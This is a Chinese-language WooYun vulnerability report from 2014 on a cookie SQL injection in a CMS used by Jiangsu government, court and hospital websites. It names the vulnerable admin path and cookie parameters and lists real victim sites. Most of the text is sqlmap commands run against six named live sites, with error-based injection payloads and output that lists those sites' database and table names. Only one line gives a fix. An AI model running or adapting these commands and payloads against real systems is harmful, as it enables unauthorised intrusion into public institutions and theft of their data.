当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077082

漏洞标题:某通用政府程序SQL注入漏洞

相关厂商:南京希迪麦德软件有限公司

漏洞作者: Mr.leo

提交时间:2014-09-23 17:05

修复时间:2014-12-22 17:06

公开时间:2014-12-22 17:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

BOOM!!

详细说明:

WooYun: 某通用政府程序SQL注入漏洞(后台管理bypass)
前人经验 默认管理后台为 http://admin.xxx.gov.cn/general/
后台url存在cookie注入 注入参数 loginlast 、passwdlast 以loginlast为例,其他厂商自行修复检查
技术支持:南京希迪麦德软件有限公司
案例:
http://www.zjrzfy.gov.cn/ 镇江市润州区人民法院
http://www.zjzy.gov.cn/ 镇江市中级人民法院
http://www.jsjrfy.gov.cn/ 句容市人民法院
http://www.njng.gov.cn/ 南京宁高高科技产业园
http://www.jsrepc.com/ 江苏省辐射环保咨询中心
http://www.sundy-whcy.com/ 圣典文化创意法律服务网
http://www.njlsjjjc.gov.cn/溧水纪检监察网
http://www.jzscxh.com/ 江苏省建筑市场管理协会
http://www.jnkjj.gov.cn/江宁科技局
http://www.jszlyy.com.cn/江苏省肿瘤医院
http://cxy.jnkjj.gov.cn/江宁区产学研合作信息网
百度搜索关键字HODE-CMS
六个案例证明下:
Sqlmap -u "http://admin.zjrzfy.gov.cn/general/index.php" --cookie "loginlast=" -- level=2
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: Cookie
Parameter: loginlast
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: loginlast=' AND (SELECT 5122 FROM(SELECT COUNT(*),CONCAT(0x3a696d78
3a,(SELECT (CASE WHEN (5122=5122) THEN 1 ELSE 0 END)),0x3a636d753a,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'UFrm'='UFrm
---
[16:22:05] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.6, Apache 2.2.25
back-end DBMS: MySQL 5.0
[16:22:05] [INFO] fetching tables for database: 'gbk_cms2012_zjrzfy'
[16:22:05] [INFO] heuristics detected web page charset 'GB2312'
[16:22:06] [WARNING] reflective value(s) found and filtering out
[16:22:06] [INFO] the SQL query used returns 35 entries
you provided a HTTP Cookie header value. The target url provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] n
[16:22:08] [INFO] retrieved: x_article
[16:22:08] [INFO] retrieved: x_column
[16:22:08] [INFO] retrieved: x_columntemplate
[16:22:09] [INFO] retrieved: x_element
[16:22:09] [INFO] retrieved: x_extra
[16:22:09] [INFO] retrieved: x_flash
[16:22:11] [INFO] retrieved: x_friendlink
[16:22:11] [INFO] retrieved: x_function
[16:22:11] [INFO] retrieved: x_guestbook_new
[16:22:12] [INFO] retrieved: x_info
[16:22:27] [INFO] retrieved: x_infoclass
[16:22:28] [INFO] retrieved: x_ip
[16:22:29] [INFO] retrieved: x_linkclass
[16:22:29] [INFO] retrieved: x_linkinfo
[16:22:30] [INFO] retrieved: x_mapping
[16:22:30] [INFO] retrieved: x_member
[16:22:30] [INFO] retrieved: x_member2
[16:22:30] [INFO] retrieved: x_memberpart
[16:22:30] [INFO] retrieved: x_partprms
[16:22:30] [INFO] retrieved: x_permitcolumn
[16:22:31] [INFO] retrieved: x_permitinfo
[16:22:32] [INFO] retrieved: x_permitmember
[16:22:33] [INFO] retrieved: x_permitrole
[16:22:33] [INFO] retrieved: x_pic
[16:22:33] [INFO] retrieved: x_shield
[16:22:33] [INFO] retrieved: x_siteconfig
Sqlmap -u "http://admin.njng.gov.cn/general/index.php" --cookie "loginlast=" --level=2
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: Cookie
Parameter: loginlast
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: loginlast=' AND (SELECT 5432 FROM(SELECT COUNT(*),CONCAT(0x3a706677
3a,(SELECT (CASE WHEN (5432=5432) THEN 1 ELSE 0 END)),0x3a7878693a,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NuVa'='NuVa
---
[16:34:57] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.6, Apache 2.2.25
back-end DBMS: MySQL 5.0
[16:34:57] [INFO] fetching database names
[16:34:59] [INFO] heuristics detected web page charset 'GB2312'
[16:34:59] [WARNING] reflective value(s) found and filtering out
[16:34:59] [INFO] the SQL query used returns 31 entries
you provided a HTTP Cookie header value. The target url provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] n
[16:35:01] [INFO] retrieved: information_schema
[16:35:01] [INFO] retrieved: cms2011_zjzy
[16:35:02] [INFO] retrieved: cms2012_dtfy
[16:35:02] [INFO] retrieved: cms2012_jrfy
[16:35:02] [INFO] retrieved: cms2012_ngy
[16:35:03] [INFO] retrieved: cms2013_lsjw
[16:35:03] [INFO] retrieved: cms_gqtxw
[16:35:03] [INFO] retrieved: cms_jnwj
[16:35:03] [INFO] retrieved: cms_jsyy
[16:35:03] [INFO] retrieved: cms_jszlyy
[16:35:03] [INFO] retrieved: cms_xlwjd2011
[16:35:03] [INFO] retrieved: cms_xwhjd
[16:35:03] [INFO] retrieved: cms_zjkfq2012
[16:35:04] [INFO] retrieved: gbk_cms2011_zjzy
[16:35:04] [INFO] retrieved: gbk_cms2012_dtfy
[16:35:04] [INFO] retrieved: gbk_cms2012_jrfy
[16:35:04] [INFO] retrieved: gbk_cms2012_ngy
[16:35:06] [INFO] retrieved: gbk_cms2012_sdwh
[16:35:06] [INFO] retrieved: gbk_cms2012_wxg
[16:35:10] [INFO] retrieved: gbk_cms2012_zjrzfy
[16:35:10] [INFO] retrieved: gbk_cms2013_jzscglxh
[16:35:11] [INFO] retrieved: gbk_cms2014_fshbzx
[16:35:12] [INFO] retrieved: gbk_cms2014_hodesoft
[16:35:12] [INFO] retrieved: gbk_cms_gcp_jszl
[16:35:12] [INFO] retrieved: gbk_cms_gqtxw
[16:35:14] [INFO] retrieved: gbk_cms_jsyy
[16:35:14] [INFO] retrieved: gbk_cms_jszlyy
[16:35:14] [INFO] retrieved: gbk_cms_xlwjd2011
[16:35:15] [INFO] retrieved: gbk_cms_zjkfq2012
[16:35:16] [INFO] retrieved: mysql
[16:35:17] [INFO] retrieved: test
Sqlmap -u "admin.njcredit.gov.cn/general/index.php" --cookie "loginlast=" --level=2
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: Cookie
Parameter: loginlast
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: loginlast=' AND (SELECT 9272 FROM(SELECT COUNT(*),CONCAT(0x3a737163
3a,(SELECT (CASE WHEN (9272=9272) THEN 1 ELSE 0 END)),0x3a7378703a,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fCLn'='fCLn
---
[16:34:57] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.6, Apache 2.2.25
back-end DBMS: MySQL 5.0
[16:34:57] [INFO] fetching database names
[16:34:57] [INFO] heuristics detected web page charset 'GB2312'
[16:34:57] [WARNING] reflective value(s) found and filtering out
[16:34:57] [INFO] the SQL query used returns 7 entries
you provided a HTTP Cookie header value. The target url provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] n
[16:34:59] [INFO] retrieved: information_schema
[16:34:59] [INFO] retrieved: gbk_cms2013_njcredit
[16:34:59] [INFO] retrieved: grzyzg
[16:34:59] [INFO] retrieved: mysql
[16:34:59] [INFO] retrieved: njic_enterprise
[16:34:59] [INFO] retrieved: performance_schema
[16:34:59] [INFO] retrieved: test
available databases [7]:
[*] gbk_cms2013_njcredit
[*] grzyzg
[*] information_schema
[*] mysql
[*] njic_enterprise
[*] performance_schema
[*] test
Sqlmap -u "http://admin.zjzy.gov.cn/general/index.php" --cookie "loginlast=" --level=2
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: Cookie
Parameter: loginlast
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: loginlast=' AND (SELECT 9206 FROM(SELECT COUNT(*),CONCAT(0x3a637462
3a,(SELECT (CASE WHEN (9206=9206) THEN 1 ELSE 0 END)),0x3a6975793a,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PkQX'='PkQX
---
[16:41:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.6, Apache 2.2.25
back-end DBMS: MySQL 5.0
[16:41:23] [INFO] fetching database names
[16:41:23] [INFO] heuristics detected web page charset 'GB2312'
[16:41:23] [WARNING] reflective value(s) found and filtering out
[16:41:23] [INFO] the SQL query used returns 31 entries
you provided a HTTP Cookie header value. The target url provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] n
[16:41:25] [INFO] retrieved: information_schema
[16:41:26] [INFO] retrieved: cms2011_zjzy
[16:41:33] [INFO] retrieved: cms2012_dtfy
[16:41:33] [INFO] retrieved: cms2012_jrfy
[16:41:34] [INFO] retrieved: cms2012_ngy
[16:41:35] [INFO] retrieved: cms2013_lsjw
[16:41:36] [INFO] retrieved: cms_gqtxw
[16:41:36] [INFO] retrieved: cms_jnwj
[16:41:36] [INFO] retrieved: cms_jsyy
[16:41:36] [INFO] retrieved: cms_jszlyy
[16:41:36] [INFO] retrieved: cms_xlwjd2011
[16:41:36] [INFO] retrieved: cms_xwhjd
[16:41:36] [INFO] retrieved: cms_zjkfq2012
[16:41:36] [INFO] retrieved: gbk_cms2011_zjzy
[16:41:36] [INFO] retrieved: gbk_cms2012_dtfy
[16:41:38] [INFO] retrieved: gbk_cms2012_jrfy
[16:41:40] [INFO] retrieved: gbk_cms2012_ngy
[16:41:40] [INFO] retrieved: gbk_cms2012_sdwh
[16:41:40] [INFO] retrieved: gbk_cms2012_wxg
[16:41:40] [INFO] retrieved: gbk_cms2012_zjrzfy
[16:41:40] [INFO] retrieved: gbk_cms2013_jzscglxh
[16:41:40] [INFO] retrieved: gbk_cms2014_fshbzx
[16:41:41] [INFO] retrieved: gbk_cms2014_hodesoft
[16:41:42] [INFO] retrieved: gbk_cms_gcp_jszl
[16:41:43] [INFO] retrieved: gbk_cms_gqtxw
[16:41:44] [INFO] retrieved: gbk_cms_jsyy
[16:41:45] [INFO] retrieved: gbk_cms_jszlyy
[16:41:45] [INFO] retrieved: gbk_cms_xlwjd2011
[16:41:45] [INFO] retrieved: gbk_cms_zjkfq2012
[16:41:45] [INFO] retrieved: mysql
[16:41:45] [INFO] retrieved: test
available databases [31]:
[*] cms2011_zjzy
[*] cms2012_dtfy
[*] cms2012_jrfy
[*] cms2012_ngy
[*] cms2013_lsjw
[*] cms_gqtxw
[*] cms_jnwj
[*] cms_jsyy
[*] cms_jszlyy
[*] cms_xlwjd2011
[*] cms_xwhjd
[*] cms_zjkfq2012
[*] gbk_cms2011_zjzy
[*] gbk_cms2012_dtfy
[*] gbk_cms2012_jrfy
[*] gbk_cms2012_ngy
[*] gbk_cms2012_sdwh
[*] gbk_cms2012_wxg
[*] gbk_cms2012_zjrzfy
[*] gbk_cms2013_jzscglxh
[*] gbk_cms2014_fshbzx
[*] gbk_cms2014_hodesoft
[*] gbk_cms_gcp_jszl
[*] gbk_cms_gqtxw
Sqlmap -u "http://admin.jsjrfy.gov.cn/general/index.php" --cookie "loginlast=" --level=2
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: Cookie
Parameter: loginlast
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: loginlast=' AND (SELECT 4432 FROM(SELECT COUNT(*),CONCAT(0x3a616961
3a,(SELECT (CASE WHEN (4432=4432) THEN 1 ELSE 0 END)),0x3a6f726f3a,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YpJb'='YpJb
---
[16:44:05] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.6, Apache 2.2.25
back-end DBMS: MySQL 5.0
[16:44:05] [INFO] fetching database names
[16:44:05] [INFO] heuristics detected web page charset 'GB2312'
[16:44:05] [WARNING] reflective value(s) found and filtering out
[16:44:05] [INFO] the SQL query used returns 31 entries
you provided a HTTP Cookie header value. The target url provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] n
[16:44:08] [INFO] retrieved: information_schema
[16:44:12] [INFO] retrieved: cms2011_zjzy
[16:44:13] [INFO] retrieved: cms2012_dtfy
[16:44:14] [INFO] retrieved: cms2012_jrfy
[16:44:14] [INFO] retrieved: cms2012_ngy
[16:44:15] [INFO] retrieved: cms2013_lsjw
[16:44:15] [INFO] retrieved: cms_gqtxw
[16:44:16] [INFO] retrieved: cms_jnwj
[16:44:17] [INFO] retrieved: cms_jsyy
[16:44:18] [INFO] retrieved: cms_jszlyy
[16:44:19] [INFO] retrieved: cms_xlwjd2011
[16:44:19] [INFO] retrieved: cms_xwhjd
[16:44:20] [INFO] retrieved: cms_zjkfq2012
[16:44:21] [INFO] retrieved: gbk_cms2011_zjzy
[16:44:21] [INFO] retrieved: gbk_cms2012_dtfy
[16:44:22] [INFO] retrieved: gbk_cms2012_jrfy
[16:44:22] [INFO] retrieved: gbk_cms2012_ngy
[16:44:23] [INFO] retrieved: gbk_cms2012_sdwh
[16:44:23] [INFO] retrieved: gbk_cms2012_wxg
[16:44:23] [INFO] retrieved: gbk_cms2012_zjrzfy
[16:44:23] [INFO] retrieved: gbk_cms2013_jzscglxh
[16:44:23] [INFO] retrieved: gbk_cms2014_fshbzx
[16:44:24] [INFO] retrieved: gbk_cms2014_hodesoft
[16:44:24] [INFO] retrieved: gbk_cms_gcp_jszl
[16:44:24] [INFO] retrieved: gbk_cms_gqtxw
[16:44:24] [INFO] retrieved: gbk_cms_jsyy
[16:44:24] [INFO] retrieved: gbk_cms_jszlyy
[16:44:24] [INFO] retrieved: gbk_cms_xlwjd2011
[16:44:24] [INFO] retrieved: gbk_cms_zjkfq2012
[16:44:25] [INFO] retrieved: mysql
[16:44:25] [INFO] retrieved: test
available databases [31]:
[*] cms2011_zjzy
[*] cms2012_dtfy
[*] cms2012_jrfy
[*] cms2012_ngy
[*] cms2013_lsjw
[*] cms_gqtxw
[*] cms_jnwj
Sqlmap -u "http://admin.jsrepc.com/general/index.php" --cookie "loginlast=" --level=2
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: Cookie
Parameter: loginlast
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: loginlast=' AND (SELECT 5803 FROM(SELECT COUNT(*),CONCAT(0x3a647668
3a,(SELECT (CASE WHEN (5803=5803) THEN 1 ELSE 0 END)),0x3a7879693a,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'oDSk'='oDSk
---
[16:45:50] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.6, Apache 2.2.25
back-end DBMS: MySQL 5.0
[16:45:50] [INFO] fetching database names
[16:45:50] [INFO] heuristics detected web page charset 'GB2312'
[16:45:50] [WARNING] reflective value(s) found and filtering out
[16:45:50] [INFO] the SQL query used returns 31 entries
you provided a HTTP Cookie header value. The target url provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] n
[16:52:17] [INFO] retrieved: information_schema
[16:52:18] [INFO] retrieved: cms2011_zjzy
[16:52:18] [INFO] retrieved: cms2012_dtfy
[16:52:18] [INFO] retrieved: cms2012_jrfy
[16:52:18] [INFO] retrieved: cms2012_ngy
[16:52:18] [INFO] retrieved: cms2013_lsjw
[16:52:18] [INFO] retrieved: cms_gqtxw
[16:52:18] [INFO] retrieved: cms_jnwj
[16:52:18] [INFO] retrieved: cms_jsyy
[16:52:19] [INFO] retrieved: cms_jszlyy
[16:52:19] [INFO] retrieved: cms_xlwjd2011
[16:52:19] [INFO] retrieved: cms_xwhjd
[16:52:19] [INFO] retrieved: cms_zjkfq2012
[16:52:19] [INFO] retrieved: gbk_cms2011_zjzy
[16:52:19] [INFO] retrieved: gbk_cms2012_dtfy
[16:52:19] [INFO] retrieved: gbk_cms2012_jrfy
[16:52:19] [INFO] retrieved: gbk_cms2012_ngy
[16:52:19] [INFO] retrieved: gbk_cms2012_sdwh
[16:52:19] [INFO] retrieved: gbk_cms2012_wxg
[16:52:19] [INFO] retrieved: gbk_cms2012_zjrzfy
[16:52:19] [INFO] retrieved: gbk_cms2013_jzscglxh
[16:52:19] [INFO] retrieved: gbk_cms2014_fshbzx
[16:52:20] [INFO] retrieved: gbk_cms2014_hodesoft
[16:52:20] [INFO] retrieved: gbk_cms_gcp_jszl
[16:52:20] [INFO] retrieved: gbk_cms_gqtxw
[16:52:20] [INFO] retrieved: gbk_cms_jsyy
[16:52:20] [INFO] retrieved: gbk_cms_jszlyy
[16:52:21] [INFO] retrieved: gbk_cms_xlwjd2011
[16:52:21] [INFO] retrieved: gbk_cms_zjkfq2012
[16:52:22] [INFO] retrieved: mysql
[16:52:22] [INFO] retrieved: test
available databases [31]:
[*] cms2011_zjzy
[*] cms2012_dtfy

漏洞证明:

已经证明

修复方案:

cookie里面的参数也要过滤

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝